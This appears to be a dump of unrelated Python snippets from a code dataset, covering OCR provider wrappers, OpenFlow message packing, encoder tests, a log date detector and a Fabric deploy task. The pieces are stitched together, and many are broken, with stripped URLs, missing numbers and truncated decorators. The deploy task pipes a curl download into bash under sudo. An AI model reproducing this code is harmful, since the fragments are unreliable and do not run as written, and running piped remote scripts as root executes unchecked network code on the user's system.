key = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz', k=5))
elif (key_type == 'int'):
key = random.randint(0, 100)
elif (key_type == 'float'):
key = round(random.uniform(0, 100), 2)
value = generate_random_value(depth, max_depth, key_type)
result[key] = value
return AttributeDict.recursive(result) |
def daly_command_message(command: int, extra=''):
assert isinstance(command, int)
address = 8
message = ('a5%i0%02x08%s' % (address, command, extra))
message = message.ljust(24, '0')
message_bytes = bytearray.fromhex(message)
message_bytes.append(calc_crc(message_bytes))
return message_bytes |
def npm_install():
installed = run('if [[ -n $(which npm) ]]; then echo 1; fi')
if (not installed):
sudo('curl -sL |bash - && apt-get install -y nodejs binutils libproj-dev gdal-bin libgeoip1 libgeos-c1;', user=env.local_user)
sudo('npm install -g browserify && npm install -g eslint', user=env.local_user) |
class FileInfo(MFileDialogModel):
size = Property(observe='file_name')
atime = Property(observe='file_name')
mtime = Property(observe='file_name')
ctime = Property(observe='file_name')
view = View(VGroup(Item('size', label='File size', style='readonly'), Item('atime', label='Last access', style='readonly'), Item('mtime', label='Last modified', style='readonly'), Item('ctime', label='Created at', style='readonly'), label='File Information', show_border=True))
_property
def _get_size(self):
try:
return (commatize(getsize(self.file_name)) + ' bytes')
except:
return ''
_property
def _get_atime(self):
try:
return strftime('%m/%d/%Y %I:%M:%S %p', localtime(getatime(self.file_name)))
except:
return ''
_property
def _get_mtime(self):
try:
return strftime('%m/%d/%Y %I:%M:%S %p', localtime(getmtime(self.file_name)))
except:
return ''
_property
def _get_ctime(self):
try:
return strftime('%m/%d/%Y %I:%M:%S %p', localtime(getctime(self.file_name)))
except:
return '' |
class OptionSeriesColumnrangeStates(Options):
def hover(self) -> 'OptionSeriesColumnrangeStatesHover':
return self._config_sub_data('hover', OptionSeriesColumnrangeStatesHover)
def inactive(self) -> 'OptionSeriesColumnrangeStatesInactive':
return self._config_sub_data('inactive', OptionSeriesColumnrangeStatesInactive)
def normal(self) -> 'OptionSeriesColumnrangeStatesNormal':
return self._config_sub_data('normal', OptionSeriesColumnrangeStatesNormal)
def select(self) -> 'OptionSeriesColumnrangeStatesSelect':
return self._config_sub_data('select', OptionSeriesColumnrangeStatesSelect) |
def test_encoding_when_nan_in_fit_df(df_enc):
df = df_enc.copy()
df.loc[len(df)] = [nan, nan, nan]
encoder = CountFrequencyEncoder(encoding_method='frequency', missing_values='ignore')
encoder.fit(df_enc)
X = encoder.transform(pd.DataFrame({'var_A': ['A', nan], 'var_B': ['A', nan], 'target': [1, 0]}))
pd.testing.assert_frame_equal(X, pd.DataFrame({'var_A': [0.3, nan], 'var_B': [0.5, nan], 'target': [1, 0]})) |
def AREA(cl: Any) -> MigrateInstruction:
t: int
if isinstance(cl, CardList):
if (cl.type == 'deckcard'):
return DECKAREA
elif (cl.type == 'droppedcard'):
return DROPAREA
elif (cl.owner is None):
return DECKAREA
else:
t = cl.owner.player.pid
elif (cl == 'dropped'):
return DROPAREA
elif (cl == 'hand'):
return HANDAREA
else:
raise Exception('WTF')
return (MigrateInstructionType.AREA, (t,)) |
def test_encoding_when_nan_in_fit_df(df_enc):
df = df_enc.copy()
df.loc[len(df)] = [nan, nan, 0]
encoder = MeanEncoder(missing_values='ignore')
encoder.fit(df[['var_A', 'var_B']], df['target'])
X = encoder.transform(pd.DataFrame({'var_A': ['A', nan], 'var_B': ['A', nan]}))
pd.testing.assert_frame_equal(X, pd.DataFrame({'var_A': [0., nan], 'var_B': [0.2, nan]})) |
def extractWalkingTheStorm(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
return buildReleaseMessageWithType(item, 'Joy of life', vol, chp, frag=frag, postfix=postfix) |
def test_has_changes_even_if_storage_root_returns_to_old_value(account_db):
account_db.set_storage(ADDRESS, 1, 2)
account_db.make_state_root()
storage_db = account_db._get_address_store(ADDRESS)
assert storage_db.has_changed_root
original_storage_root = storage_db.get_changed_root()
account_db.persist()
assert (not storage_db.has_changed_root)
account_db.set_storage(ADDRESS, 1, 3)
account_db.lock_changes()
account_db.make_state_root()
storage_db = account_db._get_address_store(ADDRESS)
assert storage_db.has_changed_root
assert (storage_db.get_changed_root() != original_storage_root)
account_db.set_storage(ADDRESS, 1, 2)
account_db.lock_changes()
account_db.make_state_root()
storage_db = account_db._get_address_store(ADDRESS)
assert storage_db.has_changed_root
repeated_storage_root = storage_db.get_changed_root()
assert (repeated_storage_root == original_storage_root) |
class DataleonApi(ProviderInterface, OcrInterface):
provider_name = 'dataleon'
def __init__(self, api_keys: Optional[Dict[(str, Any)]]=None) -> None:
self.api_settings = load_provider(ProviderDataEnum.KEY, self.provider_name, api_keys=api_keys)
self.api_key = self.api_settings['key']
self.url_invoice = '
self.url_receipt = '
self.headers = {'Api-Key': self.api_key}
def _normalize_invoice_result(original_result: Dict[(str, Any)]) -> Dict[(str, Any)]:
fields = {'ID': 'invoice_number', 'CustomerName': 'customer_name', 'IssueDate': 'date', 'Subtotal': 'subtotal', 'Tax': 'taxes', 'Total': 'invoice_total', 'DueDate': 'due_date', 'VendorAddress': 'merchant_address', 'VendorName': 'merchant_name', 'TVANumber': 'TVA_number', 'SIREN': 'siren', 'SIRET': 'siret', 'CustomerAddress': 'customer_address'}
normalized_response: Dict[(str, Any)] = {'customer_information': {}, 'merchant_information': {}}
entities = original_result['entities']
for idx in range(0, original_result['metadata']['documents'][0]['pages']):
for entity in entities:
if (entity['page'] != (idx + 1)):
continue
field_name = fields.get(entity.get('name', None), entity['name'].lower())
if (field_name == 'logo'):
continue
field_value = entity.get('text', None)
if (field_name in ['customer_name', 'customer_address']):
normalized_response['customer_information'][field_name] = field_value
elif (field_name in ['merchant_address', 'merchant_name', 'siret', 'siren']):
normalized_response['merchant_information'][field_name] = field_value
else:
normalized_response[field_name] = field_value
return normalized_response
def ocr__invoice_parser(self, file: str, language: str, file_url: str='') -> ResponseType[InvoiceParserDataClass]:
with open(file, 'rb') as file_:
response = requests.post(url=self.url_invoice, headers=self.headers, files={'file': file_})
if (response.status_code != 200):
raise ProviderException(response.text, code=response.status_code)
original_response = response.json()
normalized_response = DataleonApi._normalize_invoice_result(original_response)
invoice_parser = []
taxes: List[TaxesInvoice] = [TaxesInvoice(value=convert_string_to_number(normalized_response.get('taxes'), float), rate=None)]
invoice_parser.append(InfosInvoiceParserDataClass(merchant_information=MerchantInformationInvoice(merchant_name=normalized_response['merchant_information'].get('merchant_name'), merchant_siret=normalized_response['merchant_information'].get('siret'), merchant_siren=normalized_response['merchant_information'].get('siren'), merchant_address=normalized_response['merchant_information'].get('merchant_address'), merchant_email=None, merchant_phone=None, merchant_website=None, merchant_fax=None, merchant_tax_id=None, abn_number=None, gst_number=None, pan_number=None, vat_number=None), customer_information=CustomerInformationInvoice(customer_name=normalized_response['customer_information'].get('customer_name'), customer_address=None, customer_email=None, customer_billing_address=None, customer_id=None, customer_mailing_address=None, customer_remittance_address=None, customer_service_address=None, customer_shipping_address=None, customer_tax_id=None, abn_number=None, gst_number=None, pan_number=None, vat_number=None), invoice_number=normalized_response.get('invoice_number'), invoice_total=convert_string_to_number(normalized_response.get('invoice_total'), float), invoice_subtotal=convert_string_to_number(normalized_response.get('subtotal'), float), date=normalized_response.get('date'), due_date=normalized_response.get('due_date'), taxes=taxes, locale=LocaleInvoice(currency=normalized_response.get('currency'), language=None), gratuity=None, amount_due=None, previous_unpaid_balance=None, discount=None, service_charge=None, payment_term=None, po_number=None, purchase_order=None, service_date=None, service_due_date=None, bank_informations=BankInvoice.default()))
result: ResponseType[InvoiceParserDataClass] = ResponseType[InvoiceParserDataClass](original_response=original_response, standardized_response=InvoiceParserDataClass(extracted_data=invoice_parser))
return result
def ocr__receipt_parser(self, file: str, language: str, file_url: str='') -> ResponseType[ReceiptParserDataClass]:
with open(file, 'rb') as file_:
response = requests.post(url=self.url_receipt, headers=self.headers, files={'file': file_})
file_.close()
if (response.status_code != 200):
raise ProviderException(response.text, code=response.status_code)
original_response = response.json()
normalized_response = DataleonApi._normalize_invoice_result(original_response)
taxes: Sequence[Taxes] = [Taxes(taxes=convert_string_to_number(normalized_response.get('taxes'), float), rate=None)]
ocr_receipt = InfosReceiptParserDataClass(invoice_number=normalized_response.get('invoice_number'), invoice_total=convert_string_to_number(normalized_response.get('invoice_total'), float), invoice_subtotal=convert_string_to_number(normalized_response.get('subtotal'), float), date=normalized_response.get('date'), due_date=normalized_response.get('due_date'), customer_information=CustomerInformation(customer_name=normalized_response['customer_information'].get('customer_name')), merchant_information=MerchantInformation(merchant_name=normalized_response['merchant_information'].get('merchant_name'), merchant_siret=normalized_response['merchant_information'].get('siret'), merchant_siren=normalized_response['merchant_information'].get('siren'), merchant_address=normalized_response['merchant_information'].get('merchant_address')), taxes=taxes, locale=Locale(currency=normalized_response.get('currency')))
result = ResponseType[ReceiptParserDataClass](original_response=original_response, standardized_response=ReceiptParserDataClass(extracted_data=[ocr_receipt]))
return result
def ocr__financial_parser(self, file: str, language: str, document_type: str, file_url: str='') -> ResponseType[FinancialParserDataClass]:
if (document_type == FinancialParserType.RECEIPT.value):
url = self.url_receipt
else:
url = self.url_invoice
with open(file, 'rb') as file_:
response = requests.post(url=url, headers=self.headers, files={'file': file_}, data={'table': 'true'})
file_.close()
if (response.status_code != 200):
raise ProviderException(response.text, code=response.status_code)
original_response = response.json()
standardized_response = dataleon_financial_parser(original_response)
return ResponseType[FinancialParserDataClass](original_response=original_response, standardized_response=standardized_response) |
def bulk_run_local_args__setstate__(self, state):
state.setdefault('device_to_commands', None)
state.setdefault('timeout', 300)
state.setdefault('open_timeout', 30)
state.setdefault('client_ip', '')
state.setdefault('client_port', '')
state.setdefault('uuid', '')
self.__dict__ = state |
def wrapper(data, *args, **kwargs):
import pandas as pd
if isinstance(data, pd.DatetimeIndex):
return DatetimeIndexWrapper(data, *args, **kwargs)
if isinstance(data, pd.DataFrame):
return PandasFrameWrapper(data, *args, **kwargs)
if isinstance(data, pd.Series):
return PandasSeriesWrapper(data, *args, **kwargs)
return None |
def read_jobname(config_file):
ert_config = ErtConfig.from_file(config_file)
with open_storage(ert_config.ens_path, mode='w') as storage:
prior = storage.create_experiment().create_ensemble(name='prior', ensemble_size=ert_config.model_config.num_realizations)
run_context = ensemble_context(prior, ([True] * ert_config.model_config.num_realizations), 0, substitution_list=ert_config.substitution_list, jobname_format=ert_config.model_config.jobname_format_string, runpath_format=ert_config.model_config.runpath_format_string, runpath_file='name')
create_run_path(run_context, ert_config.substitution_list, ert_config)
return run_context[0].job_name |
_meta(characters.rinnosuke.Netoru)
class Netoru():
name = ''
description = ',,1'
def clickable(self):
g = self.game
me = self.me
try:
if (me.tags['netoru_tag'] >= me.tags['turn_count']):
return False
act = g.action_stack[(- 1)]
if isinstance(act, actions.ActionStage):
return True
except IndexError:
pass
return False
def is_action_valid(self, sk, tl):
cl = sk.associated_cards
me = self.me
if ((not cl) or (len(cl) != 2)):
return (False, '')
elif any(((c.resides_in not in (me.cards, me.showncards)) for c in cl)):
return (False, '!')
if (len(tl) != 1):
return (False, '')
t = tl[0]
if (t.life >= t.maxlife):
return (False, '...')
else:
return (True, '~')
def effect_string(self, act):
return f'{N.char(act.source)}{N.char(act.target)}' |
def test_lp():
def t1(a: int) -> typing.NamedTuple('OutputsBC', t1_int_output=int, c=str):
a = (a + 2)
return (a, ('world-' + str(a)))
def wf(a: int) -> (str, str):
(x, y) = t1(a=a)
(u, v) = t1(a=x)
return (y, v)
lp = launch_plan.LaunchPlan.get_or_create(wf, 'get_or_create1')
lp2 = launch_plan.LaunchPlan.get_or_create(wf, 'get_or_create1')
assert (lp.name == 'get_or_create1')
assert (lp is lp2)
default_lp = launch_plan.LaunchPlan.get_or_create(wf)
default_lp2 = launch_plan.LaunchPlan.get_or_create(wf)
assert (default_lp is default_lp2)
with pytest.raises(ValueError):
launch_plan.LaunchPlan.get_or_create(wf, default_inputs={'a': 3})
lp_with_defaults = launch_plan.LaunchPlan.create('get_or_create2', wf, default_inputs={'a': 3})
assert (lp_with_defaults.parameters.parameters['a'].default.scalar.primitive.integer == 3) |
def create_note(title: str, text: str, source: str, tags: str, nid: int, reminder: str, priority: int, author: str, url: Optional[str]=None, extract_start: Optional[int]=None, extract_end: Optional[int]=None) -> int:
if ((len(text) + len(title)) == 0):
return
source = (source.strip() if (source is not None) else source)
tags = ('' if (tags is None) else tags)
tags = tags.replace('"', '').replace("'", '')
tags = ((' %s ' % tags.strip()) if (len(tags.strip()) > 0) else tags)
conn = _get_connection()
id = conn.execute('insert into notes (title, text, source, tags, nid, created, modified, reminder, lastscheduled, position, extract_start, extract_end, delay, author, priority, last_priority, url)\n values (?,?,?,?,?,datetime(\'now\', \'localtime\'),"",?,?, NULL, ?, ?, NULL, ?, ?, NULL, ?)', (title, text, source, tags, nid, reminder, _date_now_str(), extract_start, extract_end, author, priority, url)).lastrowid
conn.commit()
conn.close()
if (((priority is not None) and (priority != 0)) or ((reminder is not None) and (reminder != ''))):
recalculate_priority_queue()
index = get_index()
if (index is not None):
index.add_user_note((id, title, text, source, tags, nid, ''))
if ((source is not None) and source.startswith('md:///') and source.endswith('.md')):
fpath = source[6:]
update_markdown_file(fpath, text)
return id |
class Allow(ParentValidator):
def __init__(self, value, children, message=None):
super().__init__(children, message=message)
self.value = value
def __call__(self, value):
val = value
comparing = (self.value() if callable(self.value) else self.value)
if (value is not comparing):
for child in self.children:
(value, error) = child(value)
if error:
return (val, error)
return (value, None) |
def run_demo_sdk():
store = FeatureStore(repo_path='.')
print('\n--- Online features with SDK ---')
features = store.get_online_features(features=['driver_hourly_stats:conv_rate'], entity_rows=[{'driver_id': 1001}, {'driver_id': 1002}]).to_dict()
for (key, value) in sorted(features.items()):
print(key, ' : ', value) |
class OptionSeriesAreasplinerangeSonificationTracksMappingTremoloDepth(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class bsn_gentable_entry_stats_reply(bsn_stats_reply):
version = 4
type = 19
stats_type = 65535
experimenter = 6035143
subtype = 3
def __init__(self, xid=None, flags=None, entries=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (flags != None):
self.flags = flags
else:
self.flags = 0
if (entries != None):
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.stats_type))
packed.append(struct.pack('!H', self.flags))
packed.append(('\x00' * 4))
packed.append(struct.pack('!L', self.experimenter))
packed.append(struct.pack('!L', self.subtype))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = bsn_gentable_entry_stats_reply()
_version = reader.read('!B')[0]
assert (_version == 4)
_type = reader.read('!B')[0]
assert (_type == 19)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_stats_type = reader.read('!H')[0]
assert (_stats_type == 65535)
obj.flags = reader.read('!H')[0]
reader.skip(4)
_experimenter = reader.read('!L')[0]
assert (_experimenter == 6035143)
_subtype = reader.read('!L')[0]
assert (_subtype == 3)
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.bsn_gentable_entry_stats_entry.unpack)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.flags != other.flags):
return False
if (self.entries != other.entries):
return False
return True
def pretty_print(self, q):
q.text('bsn_gentable_entry_stats_reply {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('flags = ')
value_name_map = {1: 'OFPSF_REPLY_MORE'}
q.text(util.pretty_flags(self.flags, value_name_map.values()))
q.text(',')
q.breakable()
q.text('entries = ')
q.pp(self.entries)
q.breakable()
q.text('}') |
class DateDetector(object):
_defCache = DateDetectorCache()
def __init__(self):
self.__templates = list()
self.__known_names = set()
self.__unusedTime = 300
self.__lastPos = (1, None)
self.__lastEndPos = (, None)
self.__lastTemplIdx =
self.__firstUnused = 0
self.__preMatch = None
self.__default_tz = None
def _appendTemplate(self, template, ignoreDup=False):
name = template.name
if (name in self.__known_names):
if ignoreDup:
return
raise ValueError(('There is already a template with name %s' % name))
self.__known_names.add(name)
self.__templates.append(DateDetectorTemplate(template))
def appendTemplate(self, template):
if isinstance(template, str):
key = pattern = template
if ('%' not in pattern):
key = pattern.upper()
template = DD_patternCache.get(key)
if (not template):
if (key in ('{^LN-BEG}', '{DEFAULT}')):
flt = (lambda template: ((template.flags & DateTemplate.LINE_BEGIN) if (key == '{^LN-BEG}') else None))
self.addDefaultTemplate(flt)
return
elif ('{DATE}' in key):
self.addDefaultTemplate(preMatch=pattern, allDefaults=False)
return
elif (key == '{NONE}'):
template = _getPatternTemplate('{UNB}^', key)
else:
template = _getPatternTemplate(pattern, key)
DD_patternCache.set(key, template)
self._appendTemplate(template)
logSys.info(' date pattern `%r`: `%s`', getattr(template, 'pattern', ''), template.name)
logSys.debug(' date pattern regex for %r: %s', getattr(template, 'pattern', ''), template.regex)
def addDefaultTemplate(self, filterTemplate=None, preMatch=None, allDefaults=True):
ignoreDup = (len(self.__templates) > 0)
for template in (DateDetector._defCache.templates if allDefaults else DateDetector._defCache.defaultTemplates):
if ((filterTemplate is not None) and (not filterTemplate(template))):
continue
if (preMatch is not None):
template = _getAnchoredTemplate(template, wrap=(lambda s: RE_DATE_PREMATCH.sub((lambda m: DateTemplate.unboundPattern(s)), preMatch)))
self._appendTemplate(template, ignoreDup=ignoreDup)
def templates(self):
return self.__templates
def matchTime(self, line):
if (not len(self.__templates)):
self.addDefaultTemplate()
log = (logSys.log if (logSys.getEffectiveLevel() <= logLevel) else (lambda *args: None))
log((logLevel - 1), 'try to match time for line: %.120s', line)
match = None
found = (None, , , (- 1))
ignoreBySearch =
i = self.__lastTemplIdx
if (i < len(self.__templates)):
ddtempl = self.__templates[i]
template = ddtempl.template
if (template.flags & (DateTemplate.LINE_BEGIN | DateTemplate.LINE_END)):
log((logLevel - 1), ' try to match last anchored template #%02i ...', i)
match = template.matchDate(line)
ignoreBySearch = i
else:
(distance, endpos) = (self.__lastPos[0], self.__lastEndPos[0])
log((logLevel - 1), ' try to match last template #%02i (from %r to %r): ...%r==%r %s %r==%r...', i, distance, endpos, line[(distance - 1):distance], self.__lastPos[1], line[distance:endpos], line[endpos:(endpos + 1)], self.__lastEndPos[2])
if (((line[(distance - 1):distance] == self.__lastPos[1]) or ((line[distance:(distance + 1)] == self.__lastPos[2]) and (not self.__lastPos[2].isalnum()))) and ((line[endpos:(endpos + 1)] == self.__lastEndPos[2]) or ((line[(endpos - 1):endpos] == self.__lastEndPos[1]) and (not self.__lastEndPos[1].isalnum())))):
log((logLevel - 1), ' boundaries are correct, search in part %r', line[distance:endpos])
match = template.matchDate(line, distance, endpos)
else:
log((logLevel - 1), ' boundaries show conflict, try whole search')
match = template.matchDate(line)
ignoreBySearch = i
if match:
distance = match.start()
endpos = match.end()
if ((len(self.__templates) == 1) or (template.flags & (DateTemplate.LINE_BEGIN | DateTemplate.LINE_END)) or ((distance == self.__lastPos[0]) and (endpos == self.__lastEndPos[0]))):
log(logLevel, ' matched last time template #%02i', i)
else:
log(logLevel, ' ** last pattern collision - pattern change, reserve & search ...')
found = (match, distance, endpos, i)
match = None
else:
log(logLevel, ' ** last pattern not found - pattern change, search ...')
if (not match):
log(logLevel, ' search template (%i) ...', len(self.__templates))
i = 0
for ddtempl in self.__templates:
if (i == ignoreBySearch):
i += 1
continue
log((logLevel - 1), ' try template #%02i: %s', i, ddtempl.name)
template = ddtempl.template
match = template.matchDate(line)
if match:
distance = match.start()
endpos = match.end()
log(logLevel, ' matched time template #%02i (at %r <= %r, %r) %s', i, distance, ddtempl.distance, self.__lastPos[0], template.name)
if ((i + 1) >= len(self.__templates)):
break
if (template.flags & (DateTemplate.LINE_BEGIN | DateTemplate.LINE_END)):
break
if (((distance == 0) and ddtempl.hits) and (not self.__templates[(i + 1)].template.hits)):
break
if ((distance > ddtempl.distance) or (distance > self.__lastPos[0])):
log(logLevel, ' ** distance collision - pattern change, reserve')
if (distance < found[1]):
found = (match, distance, endpos, i)
match = None
i += 1
continue
break
i += 1
if ((not match) and found[0]):
(match, distance, endpos, i) = found
log(logLevel, ' use best time template #%02i', i)
ddtempl = self.__templates[i]
template = ddtempl.template
if match:
ddtempl.hits += 1
ddtempl.lastUsed = time.time()
ddtempl.distance = distance
if (self.__firstUnused == i):
self.__firstUnused += 1
self.__lastPos = (distance, line[(distance - 1):distance], line[distance])
self.__lastEndPos = (endpos, line[(endpos - 1)], line[endpos:(endpos + 1)])
if (i and (i != self.__lastTemplIdx)):
i = self._reorderTemplate(i)
self.__lastTemplIdx = i
return (match, template)
log(logLevel, ' no template.')
return (None, None)
def default_tz(self):
return self.__default_tz
_tz.setter
def default_tz(self, value):
self.__default_tz = validateTimeZone(value)
def getTime(self, line, timeMatch=None):
if (timeMatch is None):
timeMatch = self.matchTime(line)
template = timeMatch[1]
if (template is not None):
try:
date = template.getDate(line, timeMatch[0], default_tz=self.__default_tz)
if (date is not None):
if (logSys.getEffectiveLevel() <= logLevel):
logSys.log(logLevel, ' got time %f for %r using template %s', date[0], date[1].group(1), template.name)
return date
except ValueError:
pass
return None
def _reorderTemplate(self, num):
if num:
templates = self.__templates
ddtempl = templates[num]
if (logSys.getEffectiveLevel() <= logLevel):
logSys.log(logLevel, ' -> reorder template #%02i, hits: %r', num, ddtempl.hits)
untime = (ddtempl.lastUsed - self.__unusedTime)
weight = ddtempl.weight
pos = (self.__firstUnused if (self.__firstUnused < num) else (num // 2))
def _moveable():
pweight = templates[pos].weight
if (logSys.getEffectiveLevel() <= logLevel):
logSys.log(logLevel, ' -> compare template #%02i & #%02i, weight %.3f > %.3f, hits %r > %r', num, pos, weight, pweight, ddtempl.hits, templates[pos].hits)
return ((weight > pweight) or (untime > templates[pos].lastUsed))
if (not _moveable()):
if (pos == (num - 1)):
return num
pos = (num - 1)
if (not _moveable()):
return num
del templates[num]
templates[pos:0] = [ddtempl]
while ((self.__firstUnused < len(templates)) and templates[self.__firstUnused].hits):
self.__firstUnused += 1
if (logSys.getEffectiveLevel() <= logLevel):
logSys.log(logLevel, ' -> moved template #%02i -> #%02i', num, pos)
return pos
return num |
class Bitfinex(ExchangeBase):
INDEX_SYMBOL = 0
INDEX_BID = 1
INDEX_BID_SIZE = 2
INDEX_ASK = 3
INDEX_ASK_SIZE = 4
INDEX_DAILY_CHANGE = 5
INDEX_DAILY_CHANGE_PERC = 6
INDEX_LAST_PRICE = 7
INDEX_VOLUME = 8
INDEX_HIGH = 9
INDEX_LOW = 10
def get_rates(self, ccy):
json_value = self.get_json('api.bitfinex.com', '/v2/tickers?symbols=tBSVUSD')
if ((not isinstance(json_value, list)) or (not json_value)):
raise RuntimeError(f'bad Bitfinex rates: {json_value}')
usd_entry = json_value[0]
return {'USD': Decimal(usd_entry[Bitfinex.INDEX_LAST_PRICE])} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.